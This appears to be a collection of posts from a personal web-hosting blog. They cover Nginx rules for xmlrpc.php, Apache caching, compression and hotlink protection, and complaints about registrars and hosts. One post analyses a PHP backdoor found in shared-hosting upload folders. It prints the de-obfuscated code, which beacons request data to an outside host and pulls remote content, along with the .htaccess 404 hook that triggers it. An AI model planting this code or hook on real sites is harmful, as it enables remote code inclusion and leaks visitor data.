Restricting xmlrpc.php

Earlier today, I saw some spikes on the load graph for the new server (where this site is hosted).

Upon checking the logs I saw a lot of these: - - [01/May/2020:12:21:54 +0000] "POST //xmlrpc.php HTTP/1.1" 200 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [01/May/2020:12:21:55 +0000] "POST //xmlrpc.php HTTP/1.1" 200 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" - - [01/May/2020:13:44:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" - - [01/May/2020:13:44:25 +0000] "POST //xmlrpc.php HTTP/1.1" 200 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"

I’m not mentioning the source IP owner, technical readers can look it up if they are interested. However, the second IP comes from a IP range that is rather interesting.

Searching the Internet, I found out that many people consider the xmlrpc.php as a problem. For those who are not familiar with WordPress, this file is responsible for external communications. For example when using the mobile application to manage your site, and also when you use Jetpack.

There are plugins to disable XML-RPC such as this one, but I use the app from time to time, so I would like to keep xmlrpc.php working.

The official Jetpack website provides this list for whitelisting purposes.

I have been restricting access to my /wp-admin URL for ages, using Nginx. I think it is a good idea to do the same for xmlrpc.php.

location ~ ^/(xmlrpc\.php$) {
    include conf.d/includes/jetpack-ipvs-v4.conf;
    deny all;
    include fastcgi.conf;
    fastcgi_intercept_errors on;
    fastcgi_pass php;

The simple script to update this IP list into Nginx configuration, that is consumed by the configuration above:

wget -q -O /tmp/ips-v4.txt
if [ -s /tmp/ips-v4.txt ]; then
  cat /tmp/ips-v4.txt | awk {'print "allow "$1";"'} > /tmp/${FILENAME}
  [ -s ${CONF_FILE} ] || touch ${CONF_FILE}
  if [ "$(diff /tmp/${FILENAME} ${CONF_FILE})" != "" ]; then
    echo "Files different, replacing ${CONF_FILE} and reloading nginx"
    mv -fv /tmp/${FILENAME} ${CONF_FILE}
    systemctl reload nginx
    echo "File /tmp/${FILENAME} match ${CONF_FILE}, not doing anything"
rm -f /tmp/ips-v4.txt

It can be periodically executed by cron so that when the IP list changes, the configuration gets updated.

Now, if any IP other than Jetpack tries to access /xmlrpc.php it will receive Error 403 Forbidden.

Have fun!

Leverage Browser Caching

In the previous post I wrote about enabling compression for your pages so that they would load faster to the visitor. Today I’m going to write about how you can make use of browser caching to save some bandwidth.

Some people told me that their ISP or hosting provider requested that they upgrade the hosting plan or subscribe for more bandwidth. Since this site doesn’t have that much traffic, I wouldn’t know.

However recently I was able to help on a website which has a lot of visitors compared to this site. Around 14-18 visitors per minute on a working day and the bandwidth usage was very high, more than a gigabyte per day.

For the website, I saw that there were many requests for images (photos). The images aren’t that big anyway, around 100KB each but the amount of request made it significant.

Armed with knowledge of mod_expires, I added the following clauses to .htaccess while hoping that the server has the module installed. The following configuration is minimal, and Google Pagespeed actually suggests for 1 week.

<ifmodule mod_expires.c>
        ExpiresActive On
        ExpiresByType image/gif "access plus 2 hours"
        ExpiresByType image/png "access plus 2 hours"
        ExpiresByType image/jpg "access plus 2 hours"
        ExpiresByType image/jpeg "access plus 2 hours"
        ExpiresByType text/css "access plus 2 hours"
        ExpiresByType application/javascript "access plus 2 hours"
        ExpiresByType application/x-javascript "access plus 2 hours"

Although I know why Google Analytics set its expiry to 2 hours, it’s kind of amusing since the suggestion comes from another Google product. Oh well I am allowed to be amused right?

So let’s get to the results. Here are the bandwidth graphs from both days. I enabled mod_expires at around 6PM on 5 January 2012.

We can’t really see the difference by looking at the graphs. Google Analytics shows that there are at least 200 more visits on 6 January 2012. The numbers? Here you go:

At least 400MB were saved by this technique. You can actually put specific settings for each folder in your website. For example 2 hours is nice for cosmetic images which may need to be changed frequently but not for photos. For example if you run a photography website, you can even make your photos to expire in 1 year!

What mod_expires does is actually telling the browser that the resource (images) will expire on a specific date. It’s flexible enough to set the date from the access time. Here is the link to the official manual page for mod_expires.

Please be careful to note that this is not a quick solution for the lazy. You must think hard enough to set the proper amount of time before the images expire otherwise normal users will not see your changes or updates to the image until the cache on their browsers expire!

Good luck!

Let Apache Compress Your Website

Website speed is one of the most important factor to make people like to visit more. In 2008, I wrote Compressing WordPress Output and this is done by adding one line to index.php

The problem with that approach is that when you upgrade WordPress you have to manually add the line into index.php, and the technique does not improve loading time for administration pages.

Compressing is done on the fly by Apache, and it helps improve loading time because your browser receives smaller files. While some browsers were broken (they do not know how to handle compressed content), today’s browsers are much more efficient.

If your webhost allows you to add your own .htaccess then you can use this technique. Please note that you can do this for any type of website, not limited to WordPress.

<ifmodule mod_deflate.c>
     AddOutputFilterByType DEFLATE text/text text/html text/plain text/xml text/css application/x-javascript application/javascript

As simple as that. The directive above will ask Apache to compress text, html, xml, css, and javascript files before sending them to the browser. We don’t compress images because we don’t save much on image compression plus it will be too stressful for Apache.

You can use Firebug or Chrome to actually verify whether your content is now zipped. You might have to clear your browser cache first otherwise the files will not be requested from the server. You should look for the content-encoding header and it should say “gzip”. To satisfy yourself, you might want to capture the size of the page (there should be a column for that) before and after you add the directives into .htaccess and you should be able to see a significant reduction in size.

If you don’t see gzip then the possibilities are either your webhost does not allow .htaccess or mod_deflate is not installed on the server. To see whether or not mod_deflate is installed on the server you can remove the 1st and 3rd line in .htaccess and refresh the page. If it’s not installed then you will see an error.

For Joomla! users, there’s an easier way to do it in the Global Configuration section:

Simple eh?

For WordPress, one might argue that they can change the parameter gzipcompression in the semi hidden configuration page but I tried it in WordPress 3.2.1 and it did not work. I read in WordPress forums, they removed this feature because Apache can handle it much better.

Go ahead and try it out. Your visitors will be thankful.

RegisterFly Resurrected as RegFly

I received an email yesterday:


It’s from RegFly, a resurrection of RegisterFly the lousiest domain registrar ever. I had very bad experience with them – slow system, buggy, unresponsive customer support. And now, they are no longer an ICANN accredited registrar so I guess they are reselling. Even the main domain is registered under Tucows.

ICANN announcements:

Stay away. Look for an ICANN accredited registrar.

Image Hotlink Protection

Have people been stealing images from your websites? Well, there are not so many interesting images in this site so I don’t really have that problem. You can add a watermark to your image, but I guess everyone knows that.

Another form of image theft also involves bandwidth theft. It’s has many names – hotlink, inline linking, leeching, and many others. As many of us uses shared hosting and we have limited bandwidth, it will eventually reach the barrier if bandwidth is being stolen from other sites.

I have 1.5TB monthly bandwidth limitation, but I still don’t agree to people stealing my bandwidth by hotlinking images especially since I host quite a number of sites in this account. On Apache hosting it’s easy to prevent hotlinking by utilizing .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourdomain\.com/ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpe?g|gif|bmp|png)$ /nohotlink.pne [L]

WordPress users can add the above lines before the WordPress rewrite rule:

# BEGIN WordPress

What the configuration does is check whether HTTP_REFERER to match the specified domain, or if it’s empty (direct calls, for example). If not empty and unmatched it sends the content of file /nohotlink.pne to the browser. Why? Because when images are loaded with the <img tags the referrer is the page calling the image. You can also define a nonexistent image so that a broken icon is displayed on the hotlinker’s site, or better still replace the last line with:

RewriteRule .*\.(jpe?g|gif|bmp|png)$ - [F]

My implementation will cause the image to be replaced with:

Hotlink protection

By the way the hotlink protection image is named with the .pne extension to prevent an infinite rewrite to occur. You can also use other image formats, and any other extensions. Some fussy browser might not display it correctly but who cares, the point is to prevent people from hotlinking, isn’t it?

Try it out yourself. Good luck!

Upload Folder Invasions and Security

I was doing a routine backup job for a client’s website hosted on Exabytes the other day and noticed something funny. There were supposed to be image, pdf, and video files in the upload folders but there were also .htaccess and PHP files in the main upload folder and each of the subfolders.

The first thing that crossed my mind was that my code was not secure enough – it’s difficult to handle Flash upload security so I used some most basic techniques to prevent illegal uploads. However I decided to venture into Internet Webhosting’s server (I also have an account there) and saw the same thing happening on a fellow blogger’s WordPress upload folder – which coincidentally is in the same server as my other account. I have so many “other” accounts I sometimes lost track.

Testing further I found that I am able to manipulate files located in other’s upload folder if the permission of 777 (drwxrwxrwx) is set. I was able to create new files, move existing files, and even worst delete them. Technically this is because the webserver process (apache for Apache 1.x and httpd for Apache 2.x) most usually runs as the user nobody or other common user account on the server. So it really does not matter who runs a PHP file from the browser, the server thinks the user always have the proper permission.

So in a normal shared hosting other users are actually able to copy your source code if you’re running a custom one (in contrast to WordPress which is publicly available).

This problem does not relate to other parts of the website or the database.

I am NOT going to post the codes that I use to check and test these claims, so it’s really up to you whether or not to trust me.

However the following code was in the foreign PHP files (they named using numbers – XXXXX.php), and they were in one line most probably to prevent people from understanding it. I cleaned it up to improve readability

< ?php
$a = (isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$d = (isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$z = "/?" . base64_encode($a) . "." . base64_encode($b) . "." . base64_encode($c) . "." . base64_encode($d) . "." . base64_encode($e) . "." . base64_encode($f) . "." . base64_encode($g) . "." . base64_encode($h) . ".e." . base64_encode($i) . "." . base64_encode($j);
$f = base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c) == basename($i) && isset($_REQUEST["q"]) && md5($_REQUEST["q"]) == "51e1225f5f7bca58cb02a7cf6a96dddd") 
	$f = $_REQUEST["id"];
else if($c = file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))
	$cu = curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
	$o = curl_exec($cu);

Lines 3-12 collects data about the request.
Line 14 dumps all of the collected information to a variable $z
$f is the variable that holds the URL of the culprit:

print base64_decode('cGhwc2VhcmNoLmNu');

Lines 16-17 handles some queries (I think if the request comes from them).
Line 18 tries to include the remote file

print base64_decode('aHR0cDovL2FkczEu');

Line 19 tries to load the remote file

print base64_decode('aHR0cDovLzcu');

And the final attempt in lines 23-27 tries to use the CURL extension to load

print base64_decode('aHR0cDovLzcxLg==');

How is this possible? Well, they also uploaded .htaccess files that looks like this:

Options -MultiViews
ErrorDocument 404 //path/to/upload/folder/subfolder/XXXXXX.php

And yes, it only activates if a 404 (file not found) is encountered on the folder. But still, I don’t like the intrusion. Wouldn’t you?

I can’t really think of any workaround to the permission problem as users will always have to change the permission of upload folder to 777. Even changing the group ownership to the group used by the httpd process will not prevent access to other users.

However GoDaddy seems to have a good technique in overcoming this problem as I can’t access other users’ folders. It has been a while since I wanted to find out how they implemented this – I noticed it the first time I use their hosting since I didn’t have to change permissions for my upload folders.

WP-Cache and GoDaddy Hosting

I have several blogs hosted on GoDaddy servers.

If your WordPress blog is hosted on GoDaddy hosting, do not use the WP-Cache plugin or your site will intermittently produce Error 500 (Internal Server Error). I can’t spot the error even when I enable the error logs – there seems to be none!

I’ve heard similar complaints from other GoDaddy hosting users. One thing I am sure about is that the problem is not because of the combination of WP-Cache and WordPress 2.1.3 as I have blogs hosted elsewhere that works fine with this combination.

I guess I will have to dig deeper… when I can find the time! Anyway the server speed and stability so far is good without WP-Cache – which is what we want to achieve by caching the pages. Hopefully the blogs do not overload the server anytime soon.

Hosting: Responsibility of Customer or Provider?

This post is specially dedicated to Exabyte’s latest customer newsletter, which provide very useful information on how customers could prevent servers from overloading and causing service downtime.

I do agree with what Exabytes have to say, and it is true that I noticed that when the services were down, it was indeed caused by processes using too many CPU and memory resources. However it must also be noted that not all users are efficient programmers, and sometimes the codes simply made to achieve a certain goal without considering the impact to the server resources. This is the user’s fault.

I guess you know that there is a big BUT coming: when I experience service downtime I can see that many many cron (task scheduler) jobs are running out of control on the server. Some of them were even a few weeks old. The processes are obviously user cron jobs. In this case there is a lack of policing activity from Exabytes. When a service is down, the engineers simply restart the service and not do any investigation on what caused the overload.

After receiving an email confirming that the service is already up, I usually go in and check the zombie processes and they are still there, hogging MySQL and CPU resources.

We need to keep in mind that not all users are technical and have shell access like me, and they might not even know that their application / cron job is causing any resource problems. So IMHO it’s the provider’s responsibility to alert users if such case happens.

Now I only serve images on the server, and the server in US actually checks if the user is from Asia and if the Exabytes server is up. If it’s up then the images will be served from there. If not then users will have to wait for images to load a little longer.

Click on continue reading to read the rest of this post.

Continue reading Hosting: Responsibility of Customer or Provider?

Bad Domain

I just tried to register to Chitika and Nuffnang and they both rejected my email address with this domain –

I thought all systems have updated the checking code to include .name as well, as it has been around for quite a while now.

Invalid email

Well I sent them an email to notify about this glitch. I think they’ll want to update, as this decreases frustration when bloggers with .name domain try to register.

Update: My email to Nuffnang bounced went through but I think the error I received was due to forwarding to multi recipients (like what I usually do for important email addresses). In this case, Timothy’s mail address was unreachable.

This message was created automatically by mail delivery software.

A message that you sent could not be delivered to one or more of its
recipients. This is a permanent error. The following address(es) failed:

timothy at
(ultimately generated from admin at
retry time not reached for any host after a long failure period

—— This is a copy of the message, including all the headers. ——

Return-path: <ady at>
Received: from [] (
by with smtp (Exim 4.63)
(envelope-from <ady at>)
id 1Hawvh-0007WZ-9g
for admin at; Tue, 10 Apr 2007 00:41:22 +0800

Oh well no big deal. I’ve registered using another email anyway 😉

Update: I received a reply from Nuffnang. Well done, people. Good speed.

Another Reason Not To Host In Malaysia

Would you register your blog if the Government ask you to? Although I rarely write about any sensitive issues related to the Government, I have to express myself on this one.

So now Malaysian Government is planning to make it compulsory for bloggers to register themselves. Here is an article from The Star: Bloggers may have to register

According to another this news in The Star Online, “… plan to register all bloggers using locally hosted websites …”. If this is true, I am not related anymore since I moved out from Malaysia hosting. So was my decision to move from Exabytes the correct decision to make?

We have to wait for the official announcement from the Government.

My opinion is that this is entirely not necessary. From what I see now the Government is creating another enemy, instead of embracing bloggers for a better country. Why can’t the Government take it as a challenge to make things better, or even take it as the voice of the people living in this country? There must always be a reason why people talk about bad about the Government, not only in Malaysia. A Malay proverb: Kalau tak ada angin takkan pokok bergoyang which means exactly that.

And really, this is the classic case of kerana nila setitik rosak susu sebelanga (because of one bad thing/person the entire group receives bad reputation).

So after this there should not be any question anymore why Malaysians do not host their website within the country. Not that the service is good anyway.

As usual I include the original news below in case the original article is no longer available.

Continue reading Another Reason Not To Host In Malaysia

Bye, Exabytes

It has become worst since these last few days. Mails are missing, and site is not accessible many times. I’ve set up server monitoring at and I receive on average 6 downtime alerts per day, with monitoring triggered every 30 minutes.

I’ve seen people writing about my plugin said “if you can’t access the site, try again later“. And my AdSense stats reveals that very little impression made meaning that many people are having problems to access this site, and 4 others I have set up in this server.

Accessing this site is slow, very slow. I have to do something about it now.

As I have SSH access to the server, I can see so many cron jobs that have been running for a few days, not finishing its job. One thing about Exabytes’ servers is that they have a lot of features and allow people to do things that many overseas hosting company does not allow you to do. That’s a good thing except that when a user do something stupid, there’s nobody to look over the problem.

Well, the Engineers are fast when you report something, and they are doing a good job in reactive work. But I don’t see any proactive work being done. Once I reported that the MySQL server is taking a lot of load and freezing and asked them to check which user is doing this (even if it is myself), so that it can be prevented in the future. All they can say is that the MySQL server is now running fine.

Even though it is not downtime, it is certainly close to one. The server load sometimes goes as high as 34 (this is not percentage, this is a 1 minute average load on a UNIX machine – number of process fighting over CPU resources).


And I don’t think they are going to do anything about it. I am not sure how many domains are hosted on this particluar server but I am guessing there are a lot. I checked PHP’s max_execution time using CLI and it is set to 30 seconds. So why does the ones running from cron did not die?

Continue reading Bye, Exabytes

Exabytes Replies

Following the case I wrote about Exabytes’ disappointing respond to my notification, I received an email from the Director of Business Development saying how sorry they are about the incident.

By responding to a customer without being asked is indeed a very beneficial action towards a business. Customers feel happy that there exists someone inside the company who actually cares (even if they don’t really). It’s a good business practice and kudos to Exabytes.

I suddenly remembered I watched a video once by Ron Kauffman, and he explained how good customer service can overcome product defects. I agree with him 100%, if not more.

RegisterFly Gets Ditched By eNom

One little, meaningful email from my mailbox:

This is a formal notice to owners of domains which have been registered through eNom via its reseller,


Although you purchased your name at RegisterFly, eNom is the actual registrar of record for your domains. As we are severing our relationship with RegisterFly, we are aware that this may have an impact on you as the domain owner.
Therefore we would like to offer this opportunity to assist you in securing control of your domain name directly with eNom.

Over the last year, eNom has become aware of an increasing number of complaints from dissatisfied RegisterFly customers.

As an eNom reseller, RegisterFly is contractually bound to adhere to certain standards of customer service in a speedy and diligent manner. Therefore, effective immediately, we have terminated RegisterFly as a reseller of domain names through eNom.

eNom has come to its senses, as when people buy domains from RegisterFly, eNom’s name gets displayed as well. It used to be like that; now RegisterFly is a fully accredited registrar by its own. The question is, isn’t there any control or qualification rules needed by ICANN to allow a company to be an accredited ICANN registrar?

Update: It turns out that when the domains are transferred to eNom we get an extended renewal for free! A domain I had which expired on the 17th Jan 2007 was renewed even though I was ready to let it go. Maybe this is a sign, and I should do something with that domain?

Update: It turns out that the domains are indeed expired. They keep it for themselves, the expired date shown on a whois query is one year later but the system says it’s expired. 🙂

Frustration With Exabytes

Between 00:20 to 02:10 Malaysian time (16:20 to 18:10 GMT) the Apache service on the server hosting this site was down. I know that only Apache was down due to the fact that I can’t access the webites using the web browser but I can access FTP, SSH, SMTP, and POP. Here’s what I put inside the form for Exabytes technical support:


We can’t access the site using HTTP. Apache may be down. I can access FTP, SMTP, SSH, and POP. I realized that there was a problem with the network at the data center as described in but this problem will cause outages on all services, not only HTTP.

Just letting you know as you may not realize Apache is down.

Thank you.

And the reply I received surprised me:

Dear Ady,
At the moment, our network had high latency.
Our network engineers are currently working on this issue.
You may refer to:

If you have any enquiries, please do not hesitate to contact. Thank You.
Best Regards,
KM Chow
System Engineer,
Exa Bytes Network Sdn Bhd

With an excellent customer support record so far (at least for myself), I was surprised that this Engineer (?) can’t read well. He shouldn’t have repeated the URL I already mentioned. This somehow implies that the customer can’t read and the reply really looks like a template.

I am hosting at Exabytes Malaysia due to the fact that the customer support is fast, and my access to the server is very fast. But right now I am thinking of moving my blog elsewhere. Too bad some of other sites I host here must stay due to the fact that they are targeted to Malaysian customers and the access is fast.